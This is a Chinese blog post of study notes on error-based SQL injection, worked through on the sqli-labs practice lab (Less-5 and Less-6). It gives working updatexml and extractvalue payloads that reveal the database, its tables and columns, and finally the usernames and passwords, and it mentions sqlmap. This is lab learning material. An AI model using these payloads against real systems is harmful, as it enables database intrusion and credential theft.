sql报错注入随笔

最新推荐文章于 2022-10-28 15:57:12 发布
最新推荐文章于 2022-10-28 15:57:12 发布
阅读量161 收藏
点赞数
分类专栏: 漏洞学习 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/118544188
版权

0x00 sqli-labs-less5-6考点

注入之前首先介绍两个函数
extractvalue() :对XML文档进行查询的函数
updatexml()函数与extractvalue()类似,是更新xml文档的函数。

其中database()这个位置函数便是我们注入语句查询的地方,类似与前面的联合查询方式,但是此处应该用连接符and来连接语句,不然会报语法错误

id=1"  and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

updatexml函数

?id=1" and  extractvalue(1,concat(0x7e,(select database()),0x7e))--+

extractvalue函数

0x01 注入测试

less-6实例

查库
id=1"  and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
查表 
?id=1"  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= 'security' limit 0,1),0x7e),1)--+
查列
?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'users' limit 0,1),0x7e),1) --+
查数据
?id=1"  and updatexml(1,concat(0x7e,(select group_concat(username,password) from users limit 0,1),0x7e),1)--+

less-6
第五关与第六关闭合方式不一样,也可以用报错注入,就不在shuom
less-5
手工测试完成后,我尝试了使用sqlmap,工具用起来还是比手工方便很多,按照之前文章介绍的使用方法很快便测试完成
sqlmap注入less-6

告白热
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
32-32.渗透测试SQL注入基于注入(上)
05-10
32-32.渗透测试SQL注入基于注入(上)
Activating Browser Modes with Doctype
weixin_34348111的博客
07-07 103
原文地址:https://hsivonen.fi/doctype/   In order to deal both with content written according to Web standards and with content written according to legacy practices that were prevalent in the late 1990s...
Validator框架
哈哈
04-19 128
参照:[url]http://www.blogjava.net/nokiaguy/archive/2009/02/12/254421.html[/url] 【第1步】建立ValidatorExamForm类 [code="java"] package com.yourcompany.struts.form; import org.apache.struts.action.Actio...
Validation with Java and XML Schema
yethyeth的专栏
11-22 2955
Part 1Learn the value of data validation and why pure Java isnt the complete solution for handling itBy Brett Mclaughlin, JavaWorld.com, 09/08/00As technologies have matured and APIs for Java and o
Validator校验框架笔记
Think in Java
12-11 1708
前几天尝试做一个比较大的项目作为练习,其中就牵扯到Validator校验框架,就来share下~~~登陆界面: 登陆密码误界面:——》Validator概述 《——没有Validator,你就不得不编写验证表单数据所需的全部代码,并把它放入Form Bean对象的validate( )方法中。对于想在其上进行数据验证的每个Form Bean域来说,都需要编写逻辑代
CTFHub | 注入
尼泊罗河伯的博客
10-28 2464
因为注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此题 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
SQL注入注入的一些随笔
郁离歌丶的博客
03-21 4453
0x00.序言关于注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()注入http:/...
sqli-labs-Less5 关于各种注入的学习
feng的博客
09-19 1501
前言 做Less5之前自己还只是个只会简单的updatexml的小菜鸡。做题的时候查找了大量的资料,发现注入的各种姿势。感谢郁离歌大佬的博客,给了我很大的收获。这里贴下他的文章: SQLI-LABS修炼笔记(二) SQL注入注入的一些随笔 一些基本的函数 注入中会遇到一些基本的函数,这里附上基本函数的总结: SQL注入中的常见函数 知道了这些函数后,就可以开始各种注入姿势的学习了。 双查询注入 双查询注入的具体原理,可以参考下面的文章:在这里插入代码片 详细讲解双查询注入 或者 SQL注入
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL 注入天书.pdf
08-06
SQL 注入学习天书
33-33.渗透测试渗透测试之SQL注入基于注入(下)
最新发布
05-10
渗透测试渗透测试之SQL注入基于注入(下)
sqlmap注入总结
weixin_34321753的博客
08-22 1406
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
DNSlog介绍
热门推荐
告白的博客
07-09 2万+
0x00 DNSlog 介绍 首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件, 0x01 DNSlog回显原理 首先了解一下多级域名的概念,我们知道因特网采用树状结构命名方法,按组织结构划分域是一个名字空间中一个被管理的划分,域可划分为子域,子域再可被划分为多级域名称为一级域名,二级域名,三级域名,从一个域名地址来从右到左依次是顶级域名,二级域名,三级域名,例如 gao
关于DOM型XSS的深入解析(收藏)
告白的博客
01-11 1万+
很多初次接触xss的小白,尽管知道xss的三种分类,但是在DOM型xss还是存在理解上的不足,这篇文章希望能帮助到更好的理解DOM型xss。
Apache Log4j 远程代码执行漏洞分析
告白的博客
12-10 5711
0x00 漏洞描述 apache log4j2是全球使用广泛的java日志框架,同时该漏洞还影响很多全球使用量的Top序列的通用开源组件,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响 Apache Log4j组件描述: Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架
一句话木马与大马
告白的博客
08-03 4095
0x00 大马与小马 通常为了获取权限我们会采取给网站挂马形式,例如通过注入写入,一句话木马简称小马,成功注入后可以获取到基本的getshell,而大马,顾名思义,威力也比小马要厉害很多,通常可以通过给网站挂入小马获取getshell后上传大马,获取到更多的高级权限操作等等。 0x01 sql注入之一句话木马 首先介绍一句话木马: 一句话木马是一种基于B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注
sql注入读取文件
05-22
注入是一种常见的注入攻击技术,攻击者在构造SQL查询语句时,故意使用一些误的语法或者参数,从而导致数据库执行误,返回误信息。 如果攻击者成功利用注入技术读取了数据库中的敏感信息,比如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值